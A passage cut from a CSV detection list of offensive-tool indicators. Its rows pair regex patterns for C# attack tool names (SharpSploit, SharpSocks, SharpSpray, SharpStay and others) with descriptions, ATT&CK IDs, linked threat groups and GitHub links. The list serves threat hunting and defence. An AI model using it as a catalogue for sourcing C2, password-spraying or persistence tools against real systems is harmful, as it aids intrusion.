socks4a proxy written in C# and deployable via PowerShell","T1090 - 
T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59146" "*SharpSocksCommon*",".{0,1000}SharpSocksCommon.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59147" "*SharpSocksConfig*",".{0,1000}SharpSocksConfig.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59148" "*SharpSocksImplant*",".{0,1000}SharpSocksImplant.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59149" "*SharpSocksServer*",".{0,1000}SharpSocksServer.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59150" "*SharpSocksServer.Sh*",".{0,1000}SharpSocksServer\.Sh.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - 
TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","59151" "*SharpSpawner.cs*",".{0,1000}SharpSpawner\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59152" "*SharpSphere.exe*",".{0,1000}SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59153" "*SharpSploit Command Execution*",".{0,1000}SharpSploit\sCommand\sExecution.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59154" "*SharpSploit Credentials 
Commands*",".{0,1000}SharpSploit\sCredentials\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59155" "*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59156" "*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59157" "*SharpSploit Enumeration Commands*",".{0,1000}SharpSploit\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 
- TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59158" "*SharpSploit Lateral Movement Commands*",".{0,1000}SharpSploit\sLateral\sMovement\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59159" "*SharpSploit Service*",".{0,1000}SharpSploit\sService.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59160" "*SharpSploit*",".{0,1000}SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59161" 
"*SharpSploit.Credentials.*",".{0,1000}SharpSploit\.Credentials\..{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59162" "*SharpSploit.dll*",".{0,1000}SharpSploit\.dll.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59163" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59164" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET 
and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59165" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59166" "*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59167" "*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59168" "*SharpSploit.Execution.*",".{0,1000}SharpSploit\.Execution\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59169" "*SharpSploit.Persistence.*",".{0,1000}SharpSploit\.Persistence\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59170" "*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59171" 
"*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59172" "*SharpSploitConsole.sln*",".{0,1000}SharpSploitConsole\.sln.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59173" "*SharpSploitConsole:>*",".{0,1000}SharpSploitConsole\:\>.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59174" "*SharpSploitConsole_x*",".{0,1000}SharpSploitConsole_x.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","59175" "*SharpSploitConsole_x64.exe*",".{0,1000}SharpSploitConsole_x64\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59176" 
"*SharpSploitConsole-master*",".{0,1000}SharpSploitConsole\-master.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59177" "*SharpSploitDomainRecon*",".{0,1000}SharpSploitDomainRecon.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59178" "*SharpSploitDomainReconImpl*",".{0,1000}SharpSploitDomainReconImpl.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59179" "*SharpSploitService.exe*",".{0,1000}SharpSploitService\.exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59180" "*SharpSploitSvc*",".{0,1000}SharpSploitSvc.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59181" "*SharpSplunkWhisperer2*",".{0,1000}SharpSplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59182" "*SharpSpoolTrigger.exe*",".{0,1000}SharpSpoolTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59183" "*SharpSpray*",".{0,1000}SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. 
SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","N/A","2","195","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z","59184" "*SharpSpray.exe *",".{0,1000}SharpSpray\.exe\s.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","59185" "*SharpSpray.exe*",".{0,1000}SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59186" "*SharpSpray\Program.cs*",".{0,1000}SharpSpray\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","59187" "*SharpSQL by 
@mlcsec*",".{0,1000}SharpSQL\sby\s\@mlcsec.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59188" "*SharpSQL by @mlcsec*",".{0,1000}SharpSQL\sby\s\@mlcsec.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59189" "*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59190" "*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","59191" "*SharpSQLPwn.exe*",".{0,1000}SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59192" "*SharpSSDP.exe*",".{0,1000}SharpSSDP\.exe.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","59193" "*SharpStay.csproj*",".{0,1000}SharpStay\.csproj.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59194" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","59195" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
